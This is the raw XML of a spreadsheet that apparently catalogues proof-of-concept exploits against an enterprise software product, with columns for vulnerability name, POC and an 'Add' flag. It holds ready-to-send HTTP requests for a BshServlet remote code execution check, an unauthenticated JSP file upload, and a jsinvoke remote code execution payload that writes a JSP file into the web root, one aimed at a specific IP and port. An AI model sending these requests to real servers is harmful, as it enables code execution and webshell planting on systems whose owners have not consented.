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67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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="12" uniqueCount="11">
  <si>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Vulns</t>
  </si>
  <si>
    <t>POC</t>
  </si>
  <si>
    <t>Add</t>
  </si>
  <si>
    <t>BshServlet RCE</t>
  </si>
  <si>
    <t>POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 31
Host: xxx
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
bsh.script=print("bshservlet0check");</t>
  </si>
  <si>
    <t>yes</t>
  </si>
  <si>
    <t>grouptemplet upload</t>
  </si>
  <si>
    <t>POST /uapim/upload/grouptemplet?groupid=nc&amp;fileType=jsp&amp;maxSize=999 HTTP/1.1
Host: your_ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
------WebKitFormBoundaryEXmnamw5gVZG9KAQ
Content-Disposition: form-data; name="file"; filename="xxx.jsp"
Content-Type: application/octet-stream
hello Nc
------WebKitFormBoundaryEXmnamw5gVZG9KAQ--</t>
  </si>
  <si>
    <t>no</t>
  </si>
  <si>
    <t>uapjs RCE</t>
  </si>
  <si>
    <t>POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Content-Type: application/json; charset=utf-8
Content-Length: 482
Host: 124.70.52.156:10295
Connection: keep-alive
Accept-Encoding: gzip, deflate, br
{
                "serviceName": "nc.itf.iufo.IBaseSPService",
                "methodName": "saveXStreamConfig",
                "parameterTypes": [
                    "java.lang.Object",
                    "java.lang.String"
                ],
                "parameters": [
                    "${param[param.l]()[param.a](param.b)[param.c]()[param.d](param.e)[param.f](header.UmgnUQapJZ)}",
                    "webapps/nc_web/.UmgnUQapJZ.jsp"
                ]
            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</si>
</sst>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www.wps.cn/officeDocument/2021/sharedlinks" Target="sharedlink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topLeftCell="A4" workbookViewId="0">
      <selection activeCell="C4" sqref="C4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11" defaultRowHeight="17.6" outlineLevelRow="4" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="49.8333333333333" customWidth="1"/>
    <col min="2" max="2" width="54.1666666666667" customWidth="1"/>
    <col min="3" max="3" width="43.3333333333333" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="2" ht="238" customHeight="1" spans="1:3">
      <c r="A2" t="s">
        <v>3</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>4</v>
      </c>
      <c r="C2" s="3" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="3" ht="282" spans="1:3">
      <c r="A3" t="s">
        <v>6</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>7</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="4" ht="405" spans="1:3">
      <c r="A4" t="s">
        <v>9</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="5" spans="2:2">
      <c r="B5" s="5"/>
    </row>
  </sheetData>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="C4 C1:C3 C5:C1048576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reputati0n</dc:creator>
  <cp:lastModifiedBy>reputati0n</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-18T16:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-18T16:49:35Z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5F54E9F8BB557CDA3CE6A2683CC520F0_42</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.22522.22522</vt:lpwstr>
  </property>
</Properties>
</file>